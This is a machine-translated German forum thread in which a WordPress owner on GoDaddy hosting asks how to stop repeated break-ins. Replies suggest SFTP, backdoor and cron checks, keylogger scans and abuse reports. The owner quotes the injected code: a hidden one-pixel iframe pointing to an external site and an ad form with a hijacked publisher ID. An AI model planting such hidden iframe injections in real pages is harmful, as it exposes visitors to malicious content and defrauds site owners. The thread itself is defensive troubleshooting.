Letztes Update:
Die Dinge waren in den letzten Wochen friedlich und haben mir viel mehr über die Sicherheit und die Risiken von Websites beigebracht. Hier ist meine Version der Geschichte -
Ich habe eine ältere Version von WordPress verwendet und wahrscheinlich hat mich diese Person von Google erwischt. Ich denke, es war ein Skriptangriff. Es ist schwer zu sagen, wie und wann die Sicherheit tatsächlich gefährdet wurde, aber ich wurde am 5. November 2009 darauf aufmerksam. Ich habe zu diesem Zeitpunkt zwar einige Sicherheitsmaßnahmen ergriffen (siehe unten), aber es besteht immer die Möglichkeit, dass ich es versäumt habe, WordPress-Passwörter zu ändern, wenn Ich habe meinen Arbeitscomputer formatiert.
Jetzt habe ich alle nicht erforderlichen PHP-Skripte vom Hosting gelöscht, den Verwaltungsteil nur für meine IP zugänglich gemacht und einen bestimmten IP-Bereich blockiert, der zu Vietnam gehört. Tägliche Backups und andere Dinge. Die Sache ist, dass es so viele Variablen gibt und es zu schwierig ist, alles im Auge zu behalten. Die Hauptstunde ist darauf vorbereitet. :) :)
Ich habe einen gemeinsamen Hosting-Plan von GoDaddy und betreibe eine WordPress-Website. Meine Website wurde am 5. November 2009 zum ersten Mal gehackt. Zu diesem Zeitpunkt ersetzte der Hacker meine Anzeigen durch seine eigenen. Ich dachte, es sei wegen meiner Faulheit mit der Sicherheit passiert, aber ich habe mich so geirrt.
Ich habe meinen Computer formatiert und alles neu eingerichtet. ESET NOD32 wurde durch Microsoft Security Essentials ersetzt. Auf die neueste Version von WordPress aktualisiert. Alle Passwörter geändert. Richten Sie eine neue Datenbank ein. Und andere sicherheitsrelevante Dinge, die ich hier und da gelesen habe. Die Dinge haben eine Weile gut funktioniert, bis meine Seite heute wieder gehackt wurde.
Das letzte Mal hat der Typ mit vielen Dateien gespielt und speziell footer.php und alle werbebezogenen Dateien geändert. Aber diesmal ging er einfach an die richtige Stelle und ersetzte durch folgenden Code -
<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME>
<form action="http://www.google.com/cse" id="cse-search-box">
<div>
<input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" />
<input type="hidden" name="ie" value="ISO-8859-1" />
<input type="text" name="q" size="31" />
<input type="submit" name="sa" value="Search" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
Sieht so aus, als wäre diese Person nicht daran interessiert, Datenbanken usw. zu manipulieren, sondern nur Code zu platzieren und schnell Geld zu verdienen. Godaddy hat meine FTP-Protokolle weitergeleitet und es gab einen nicht autorisierten Zugriff von IP - 117.2.56.31. Diese IP gehört zu Vietnam und auch http://blackberryrss.com hat eine Verbindung zu Vietnam.
Es gibt keinen SSH-Zugriff auf mein Konto und ich verbinde mich über FireFTP mit FTP. Dies war GoDaddys Antwort beim letzten Mal -
Bei der Überprüfung Ihres Kontos haben wir festgestellt, dass Ihr FTP-Konto entweder aufgrund von Malware auf Ihrem lokalen Computer oder eines schwachen FTP- / Hosting-Passworts kompromittiert wurde.
Aber ich hatte alle Passwörter geändert, Konten gelöscht usw., aber nichts scheint zu funktionieren. Ich bin im Moment ahnungslos. Bitte sag mir was zu tun ist? Wie kann ich den unbefugten Zugriff auf mein Konto verhindern?
Zusätzliche Details:
- Die Stärke des Passworts ist nur stark, aber nicht am besten.
- Ich persönlich verwende Windows XP SP3, Windows Firewall usw. Nach dem ersten Angriff habe ich gelernt, mit einem Benutzerkonto zu arbeiten und ein Administratorkonto zu vermeiden.
- Wenn ich FTP-Protokolle für den ersten Angriff sehe, ist es ziemlich klar, dass die Person dies alles manuell ausführt.
Antworten:
Beachten Sie, dass FTP Ihr Passwort in CLEAR TEXT sendet. Das Kompromisspotential ist also definitiv vorhanden.
Eine andere zu berücksichtigende Sache, ist Ihr FTP-Passwort für Ihr Hosting EINZIGARTIG? Sind Sie sicher, dass Sie es nirgendwo anders verwenden? Keine anderen Konten, Websites usw.?
Wie sicher ist Ihr EMAIL-Passwort? Ich war in Fälle verwickelt, in denen das "schwache Glied" tatsächlich das E-MAIL-Passwort war und der Täter nur "vergessene Passwörter" an die E-Mail schickte und die Beweise aus der E-Mail-Box löschte, während alle zu beschäftigt waren, sich auf den kompromittierten Server zu konzentrieren beachten.
Nur ein paar Dinge, die mir in den Sinn kamen ... einige andere Dinge wären natürlich ein Social-Engineering-Ansatz mit Ihrem ISP oder eine Software-Schwachstelle auf Ihrem Server oder eines der Pakete, die Sie hosten.
Es gibt mehr (offensichtlich), aber das sind normalerweise die "üblichen Verdächtigen".
AKTUALISIEREN:
Aufgrund dieser neuen Informationen (dass der Hacker kein FTP zum Ändern Ihrer Dateien verwendet) kann ich nur annehmen, dass die wahrscheinlichste Ursache wahrscheinlich eine ungesicherte Web-App ist.
Das ist nicht das EINZIGE, was es sein kann, aber in solchen Fällen ist es am wahrscheinlichsten.
Eine andere Sache, die Sie berücksichtigen (und prüfen) sollten, ist, ob er sich eine Art "Hintertür" für Ihre App hinterlassen hat. Ich erinnere mich an Ihre Erwähnung, dass Ihr ISP sagte, er sei über FTP hereingekommen. Ist es möglich, dass er das erste Mal über FTP hereingekommen ist und sich eine Hintertür hinterlassen hat?
Es ist auch ein Schuss in die Dunkelheit, aber ich habe persönlich kompromittierte Kisten gesehen, in denen ein Hacker nur EINMAL kam, aber einen Cron-Job hinterließ, der ständig Dateien und andere verschiedene Übel wechselte. Ist es möglich, dass der Hacker NICHT zurückgekommen ist und Sie es mit einem automatisierten Skript zu tun haben? Nur etwas zu überprüfen, ob Sie das Gefühl haben, alle anderen Möglichkeiten ausgeschöpft zu haben.
Haben Sie schließlich Zugriff auf Ihre Webprotokolle, Systemprotokolle usw.? Wenn ja, was sagen sie? Zeigen sie irgendwelche Hinweise?
quelle
Vielleicht möchten Sie Detail Post-Mortem eines WordPress-Hack lesen . Ein weiterer Beitrag, der viele Informationen über einen WordPress-Blog-Hack mit Links enthält. WordPress selbst hat eine FAQ darüber, was zu tun ist, nachdem Ihr Blog gehackt wurde.
WordPress ist eine stark zielgerichtete Anwendung, nur wegen ihrer Beliebtheit. Der Kampf gegen Hacker dieser Websites ist eine Vollzeitbeschäftigung. Aus Ihrer Beschreibung geht hervor, dass jemand einen Exploit von WordPress gefunden hat, der ihn zu seinem vollen Vorteil nutzt. Sie hören sich so an, als würden Sie bisher alles richtig machen, aber ich denke, dass der Angreifer eine Datei auf Ihre Site legt und den Angriff aus dieser Richtung. Der erste Link, auf den ich Sie hingewiesen habe, enthält eine sehr detaillierte Beschreibung dieser und der Schritte, die sie unternommen haben, um dem entgegenzuwirken.
Am Ende müssen Sie möglicherweise darüber nachdenken, von WordPress zu einer anderen Blogging-Anwendung zu wechseln. Viel Glück beim Verteidigen und hoffe, dass dies einigen hilft.
quelle
GoDaddy bietet Ihnen SSH-Zugriff und Sie können über Putty.exe auf Port 22 eine Verbindung zu Ihrem Konto herstellen. Sobald Sie verbunden sind, können Sie mit Putty 2 Proxys / Tunnel auf Port 20 und 21 erstellen. Anschließend können Sie FTP über den gesicherten Tunnel verwenden Holen Sie sich zu Ihren Dateien.
Oder, noch besser, Sie können das Gleiche mit dem Befehl PSFTP.exe viel einfacher tun oder mit dem FileZilla-Client eine Verbindung zu Port 22 herstellen.
quelle
Dumme Frage, aber - haben Sie versucht, das Passwort zu ändern und einen anderen Computer zu verwenden? Möglicherweise befindet sich auf Ihrem PC ein Tastendruck-Logger.
Ich vermute hier einen Streich oder zumindest einen gezielten Angriff. Ist jemand, den Sie kennen, bereit, einen solchen Witz zu spielen?
Treten Sie aus der Box, bevor Sie zu paranoid werden. Es hilft.
ps: oder vielleicht ein missbrauchtes WordPress-Thema. Oder falsche Anmeldeinformationen beim DB-Zugriff.
quelle
Wenn Sie nicht alle FTP-Sitzungen über einen sicheren Tunnel ausführen (oder noch besser, verwenden Sie SFTP), wird dieses Kennwort abgehört.
Unsere Standardpraxis ist, überhaupt kein FTP zu haben. Bei Bedarf erlauben wir nur anonymes FTP und beschränken dies stark auf einen bekannten Bereich.
Wenn ein Upload erforderlich ist, ist die Auflistung des Upload-Verzeichnisses nicht zulässig.
quelle
Um ehrlich zu sein, würde ich den ISP bitten, diese IP auf Firewall-Ebene zu blockieren. Wenn GoDaddy dazu nicht bereit ist, dann scheint es mir, dass sie ein verantwortungsloser Hoster sind, der keine Schritte unternimmt, um Ihre Daten zu schützen, und Sie sollten wechseln.
blackberryrss.com befindet sich in den USA, sodass Sie eine Hebelwirkung haben, die Sie nutzen können:
DNS-Material
Geben Sie hier die Publisher-ID an. Google ist EXTREM ernst, wenn es um betrügerische Aktivitäten in seinem AdSense-Netzwerk geht. Missbrauch von Google Adsense melden
Um ehrlich zu sein, sollte GoDaddy es nicht einmal zulassen, da das umgekehrte DNS dieser IP "localhost" ist, was eine RIESIGE rote Fahne ist. Es sollte nur 1 IPv4-Adresse in localhost aufgelöst werden (vorausgesetzt natürlich, wir sprechen nur über die Standard-IP-Adressen), und das ist 127.0.0.1. DNS-Zeug
Um noch tiefer in das Kaninchenloch zu graben, scheint Bluehost ihren Server zu hosten. Rufen Sie sie an und sehen Sie, was sie tun möchten (wenn überhaupt).
Und Sie haben immer die Möglichkeit, sich bei Ihren lokalen Behörden zu melden (es ist eine Straftat, Zugang zu Netzwerken und Computern zu erhalten, auf die Sie kein Recht oder Privileg haben).
quelle
Ihr FTP-Passwort wird beschnüffelt, es passiert mit unseren dort gehosteten Websites sehr viel.
quelle